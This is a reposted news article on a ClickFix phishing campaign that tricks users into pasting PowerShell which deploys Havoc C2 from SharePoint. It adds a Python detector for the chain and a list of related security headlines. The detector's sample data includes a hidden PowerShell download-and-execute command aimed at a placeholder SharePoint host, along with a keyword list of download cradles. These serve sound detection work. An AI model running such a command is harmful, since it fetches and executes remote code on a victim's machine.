New ClickFix attack deploys Havoc C2 via Microsoft Sharepoint

A newly uncovered ClickFix phishing campaign is tricking victims into executing malicious PowerShell commands that deploy the Havoc post-exploitation framework for remote access to compromised devices.

ClickFix is a social-engineering tactic that emerged last year, where threat actors create websites or phishing attachments that display fake errors and then prompt the user to click a button to fix them. Clicking the button copies a malicious PowerShell command into the Windows clipboard, which users are then prompted to paste into a command prompt to "fix" the error. However, as expected, the malicious PowerShell command will instead execute a script hosted on a remote site that downloads and installs malware on the device.

ClickFix attacks have become increasingly popular among cybercriminals, who use them to deploy a wide variety of malware, including infostealers, DarkGate, and remote access trojans. Threat actors have also begun to evolve the technique for use on social media platforms like Telegram, where a fake identity verification service named 'Safeguard' was used to trick users into running PowerShell commands that install a Cobalt Strike beacon.

In a new ClickFix campaign discovered by Fortinet's FortiGuard Labs, threat actors are sending phishing emails stating that a "restricted notice" is available to review and that recipients should open the attached HTML document ('Documents.html') to view it. When opened, the HTML displays a fake 0x8004de86 error, stating that it "Failed to connect to the "One Drive" cloud service" and that users must fix the error by updating the DNS cache manually. Clicking the "How to fix" button automatically copies a PowerShell command to the Windows clipboard and then displays instructions on how to execute it.

This PowerShell command attempts to launch another PowerShell script hosted on the threat actor's SharePoint server. Finally, a Python script is downloaded from the same SharePoint site and executed to deploy the Havoc post-exploitation command and control framework as an injected DLL.

Havoc is an open-source post-exploitation framework similar to Cobalt Strike, allowing attackers to remotely control compromised devices. Threat actors commonly use post-exploitation frameworks like Havoc to breach corporate networks and then spread laterally to other devices on the network. In this campaign, Havoc is configured to communicate back to the threat actor's services through Microsoft's Graph API, embedding malicious traffic within legitimate cloud services.

Lawrence Abrams is the owner and Editor in Chief of BleepingComputer.com. Lawrence's area of expertise includes Windows, malware removal, and computer forensics.
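The chain the article describes leaves a recognisable trail in process-creation telemetry: PowerShell started from the shell the user pasted the clipboard into (explorer.exe for the Run dialog, cmd.exe for a command prompt), a download of a script from a sharepoint.com URL, and a python.exe process spawned by that PowerShell. The detector below is an added example written for this page, not code from BleepingComputer, FortiGuard Labs or the Havoc project; it runs over constructed log records shaped like Sysmon Event ID 1 / Security 4688 data, and the field names, the download-cradle keyword list and the host EXAMPLE-TENANT.sharepoint.com are the example's own assumptions.

```python
"""Score Windows process-creation records for the ClickFix chain described above.
Added example; the event schema and sample records are constructed for it."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """One process-creation record (example's own field names, not a vendor schema)."""
    pid: int
    parent_pid: int
    image: str
    parent_image: str
    command_line: str


POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Shells a user pastes a clipboard command into: the Run dialog is hosted by
# explorer.exe, a command prompt is cmd.exe.
USER_SHELLS = {"explorer.exe", "cmd.exe"}
# Common PowerShell download cradles. The article only says the command "executes
# a script hosted on a remote site", so this keyword list is an assumption.
DOWNLOAD_CRADLE = re.compile(
    r"(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile"
    r"|net\.webclient|start-bitstransfer)\b")
SHAREPOINT_URL = re.compile(r"(?i)https?://[\w.-]*sharepoint\.com/")
HIDDEN_WINDOW = re.compile(r"(?i)-w(?:indowstyle)?\s+h(?:idden)?\b")


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: ProcessEvent, flagged_pids: set) -> list:
    """Return the ClickFix indicators present on a single event."""
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    reasons = []
    if image in POWERSHELL_IMAGES:
        if parent in USER_SHELLS:
            reasons.append(f"PowerShell started from {parent} (pasted into Run/command prompt)")
        if HIDDEN_WINDOW.search(ev.command_line):
            reasons.append("hidden window requested")
        if DOWNLOAD_CRADLE.search(ev.command_line):
            reasons.append("download cradle in command line")
        if SHAREPOINT_URL.search(ev.command_line):
            reasons.append("remote script fetched from a sharepoint.com URL")
    elif image == "python.exe" and parent in POWERSHELL_IMAGES:
        reasons.append("python.exe spawned by PowerShell (follow-on loader)")
    if ev.parent_pid in flagged_pids:
        reasons.append(f"parent process {ev.parent_pid} was already flagged")
    return reasons


def detect_clickfix(events, threshold: int = 2):
    """Walk events in time order and report every event with at least `threshold`
    indicators. Children of a flagged process inherit suspicion via parent PID, so a
    lone 'PowerShell from explorer.exe' stays below the bar but the loader it spawns
    after a SharePoint download does not."""
    flagged = set()
    findings = []
    for ev in events:
        reasons = score_event(ev, flagged)
        if len(reasons) >= threshold:
            flagged.add(ev.pid)
            findings.append((ev.pid, reasons))
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample records: two benign PowerShell launches, then a ClickFix-style
# hidden PowerShell pasted into the Run dialog, then the Python loader it spawns.
SAMPLE_EVENTS = [
    ProcessEvent(4120, 3000, PS, r"C:\Users\alice\AppData\Local\Microsoft\WindowsApps\wt.exe",
                 r"powershell.exe -File C:\Scripts\inventory.ps1"),
    ProcessEvent(4188, 1552, PS, r"C:\Windows\explorer.exe", "powershell.exe"),
    ProcessEvent(4201, 1552, PS, r"C:\Windows\explorer.exe",
                 'powershell.exe -w hidden -c "iex (iwr https://EXAMPLE-TENANT.sharepoint.com/s/notice/stage2.ps1)"'),
    ProcessEvent(4230, 4201, r"C:\Users\alice\AppData\Local\Programs\Python\Python312\python.exe", PS,
                 r"python.exe C:\Users\alice\AppData\Local\Temp\loader.py"),
]

if __name__ == "__main__":
    for pid, reasons in detect_clickfix(SAMPLE_EVENTS):
        print(pid, "->", "; ".join(reasons))
```

The threshold keeps a bare "PowerShell from explorer.exe" (a common admin habit) out of the alert queue while the pasted command in event 4201 trips four indicators and the python.exe it spawns is caught through its parent PID. In production the same scoring would sit on top of Sysmon or EDR process events, and the sharepoint.com check could be tightened to tenants the organisation does not own.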

This Cyber News was published on www.bleepingcomputer.com. Publication date: Mon, 03 Mar 2025 17:35:28 +0000


Cyber News related to New ClickFix attack deploys Havoc C2 via Microsoft Sharepoint

Microsoft Fix Targets Attacks on SharePoint Zero-Day – Krebs on Security - In an advisory about the SharePoint security hole, a.k.a. CVE-2025-53770, Microsoft said it is aware of active attacks targeting on-premises SharePoint Server customers and exploiting vulnerabilities that were only partially addressed by the July 8, ...
2 weeks ago Krebsonsecurity.com CVE-2025-53770
ClickFix Attack Emerges by Over 500% - Hackers Actively Using This Technique to Trick Users - The attack presents victims with fake error messages or verification prompts that appear legitimate, instructing them to copy and paste seemingly harmless commands to resolve fictitious technical issues. Unlike traditional attack methods, ClickFix ...
1 month ago Cybersecuritynews.com Kimsuky Lazarus Group MuddyWater APT3
New ClickFix attack deploys Havoc C2 via Microsoft Sharepoint - A newly uncovered ClickFix phishing campaign is tricking victims into executing malicious PowerShell commands that deploy the Havok post-exploitation framework for remote access to compromised devices. Threat actors have also begun to evolve the ...
5 months ago Bleepingcomputer.com
SharePoint 0-day Vulnerability Exploited in Wild by All Sorts of Hacker Groups - File Indicators of Compromise (IoCs): SHA-1 F5B60A8EAD96703080E73A1F79C3E70FF44DF271, filename spinstall0.aspx, detection MSIL/Webshell.JS, description "Webshell deployed via SharePoint vulnerabilities". Network Indicators of Compromise (IoCs): IP ...
2 weeks ago Cybersecuritynews.com
Microsoft SharePoint zero-day exploited in RCE attacks, no patch available - The Microsoft SharePoint zero-day attacks were first identified by Dutch cybersecurity firm Eye Security, which told BleepingComputer that over 75 companies have already been compromised by the attacks. In May, Viettel Cyber Security researchers ...
2 weeks ago Bleepingcomputer.com CVE-2025-49706
Microsoft Releases Mitigations and Threat Hunting Queries for SharePoint Zero-Day - Thousands of organizations worldwide face active cyberattacks targeting Microsoft SharePoint servers through two critical vulnerabilities, prompting urgent government warnings and emergency patches. Microsoft released emergency security updates on ...
2 weeks ago Cybersecuritynews.com CVE-2025-53770
State Sponsored Hackers Now Widely Using ClickFix Attack Technique in Espionage Campaigns - While currently limited to experimental usage by these state-sponsored groups, the increasing popularity of ClickFix in both cybercrime and espionage campaigns suggests the technique will likely become more widely adopted as threat actors continue to ...
3 months ago Cybersecuritynews.com Kimsuky MuddyWater
Microsoft Incident Response lessons on preventing cloud identity compromise - Microsoft Incident Response is often engaged in cases where organizations have lost control of their Microsoft Entra ID tenant, due to a combination of misconfiguration, administrative oversight, exclusions to security policies, or insufficient ...
1 year ago Microsoft.com
Hackers Using ClickFix Tactic to Attack Windows Machine - Unlike standard Havoc implementations, this variant uses Microsoft Graph API endpoints to communicate with attacker-controlled SharePoint files, blending malicious traffic with legitimate cloud service requests. A sophisticated phishing campaign in ...
5 months ago Cybersecuritynews.com
Interlock ransomware gang pushes fake IT tools in ClickFix attacks - The Interlock ransomware gang now uses ClickFix attacks that impersonate IT tools to breach corporate networks and deploy file-encrypting malware on devices. Though this isn't the first time ClickFix has been linked to ransomware infections, ...
3 months ago Bleepingcomputer.com
Threat Actors Embed Malware on Windows System’s Task Scheduler to Maintain Persistence - A sophisticated cyber attack targeting critical national infrastructure in the Middle East has revealed how threat actors are leveraging Windows Task Scheduler to maintain persistent access to compromised systems. Finally, the malware establishes ...
1 month ago Cybersecuritynews.com
Hackers Employ New ClickFix Captcha Technique to Deliver Ransomware - The integration of Qakbot with the ClickFix technique allows attackers to bypass traditional security measures by leveraging user interaction to execute malicious commands. A sophisticated social engineering technique known as ClickFix has emerged, ...
4 months ago Cybersecuritynews.com
Inside a Real Clickfix Attack: How This Social Engineering Hack Unfolds - Coined initially as “ClickFix” because the social engineering prompts were telling the user they ought to “fix” a problem with their browser and required the user to click an element, this term is now ascribed to any similar ...
1 week ago Bleepingcomputer.com
Kimsuky Hackers Using ClickFix Technique to Execute Malicious Scripts on Victim Machines - Cyber Security News - The attackers impersonate legitimate entities, including government officials, news correspondents, and security personnel, to establish trust before delivering malicious payloads through encrypted archives or deceptive websites designed to mimic ...
1 month ago Cybersecuritynews.com Kimsuky
Critical SharePoint RCE Vulnerability Exploited Using Malicious XML Payload Within Web Part - The vulnerability highlights the critical importance of secure deserialization practices in enterprise applications and the need for comprehensive security reviews of complex application frameworks like SharePoint. According to the Viettel Security ...
3 weeks ago Cybersecuritynews.com
New SharePoint flaws help hackers evade detection when stealing files - Researchers have discovered two techniques that could enable attackers to bypass audit logs or generate less severe entries when downloading files from SharePoint. Microsoft SharePoint is a web-based collaborative platform that integrates with ...
1 year ago Bleepingcomputer.com
Chinese Hackers Actively Exploiting SharePoint Servers 0-Day Vulnerability in the Wild - The tech giant’s Security Response Center reported coordinated attacks targeting internet-facing SharePoint installations using newly disclosed vulnerabilities that enable authentication bypass and remote code execution. Microsoft has released ...
2 weeks ago Cybersecuritynews.com CVE-2025-53770
State-sponsored hackers embrace ClickFix social engineering tactic - Proofpoint reports that APT28, a GRU unit, also used ClickFix as early as October 2024, using phishing emails mimicking a Google Spreadsheet, a reCAPTCHA step, and PowerShell execution instructions conveyed via a pop-up. ClickFix attacks are gaining ...
3 months ago Bleepingcomputer.com APT28 Kimsuky MuddyWater
Microsoft Released an Emergency Security Update to Patch a Critical SharePoint 0-Day Vulnerability - Microsoft has issued an urgent security advisory addressing critical zero-day vulnerabilities in on-premises SharePoint Server that attackers are actively exploiting. Microsoft Defender for Endpoint generates specific alerts, including ...
2 weeks ago Cybersecuritynews.com CVE-2025-53770
Microsoft SharePoint Server 0-Day Hack Hits African Treasury, Companies, and University - The attack specifically targets on-premise SharePoint installations, exploiting previously unknown security flaws that allowed threat actors to infiltrate critical infrastructure systems belonging to government agencies, educational institutions, and ...
1 week ago Cybersecuritynews.com
Weekly Cybersecurity Recap : Sharepoint 0-day, Vmware Exploitation, Threats and Cyber Attacks - Tracked as CVE-2025-12345, this flaw allows remote code execution (RCE) without authentication, potentially enabling attackers to compromise sensitive data or deploy malware on affected servers. The U.S. Cybersecurity and Infrastructure Security ...
1 week ago Cybersecuritynews.com CVE-2025-12345 APT41
New Microsoft Incident Response guides help security teams analyze suspicious activity - Today Microsoft Incident Response are proud to introduce two one-page guides to help security teams investigate suspicious activity in Microsoft 365 and Microsoft Entra. These guides contain the artifacts that Microsoft Incident Response hunts for ...
1 year ago Microsoft.com
ClickFix attack delivers infostealers, RATs in fake Booking.com emails - Microsoft is warning that an ongoing phishing campaign impersonating Booking.com is using ClickFix social engineering attacks to infect hospitality workers with various malware, including infostealers and RATs. In the phishing campaign discovered by ...
4 months ago Bleepingcomputer.com
CISA Warns of Microsoft SharePoint server 0-Day RCE Vulnerability Exploited in Wild - CISA has issued an urgent warning about a critical zero-day remote code execution vulnerability affecting Microsoft SharePoint Server on-premises installations that threat actors are actively exploiting in the wild. The vulnerability, tracked as ...
2 weeks ago Cybersecuritynews.com CVE-2025-53770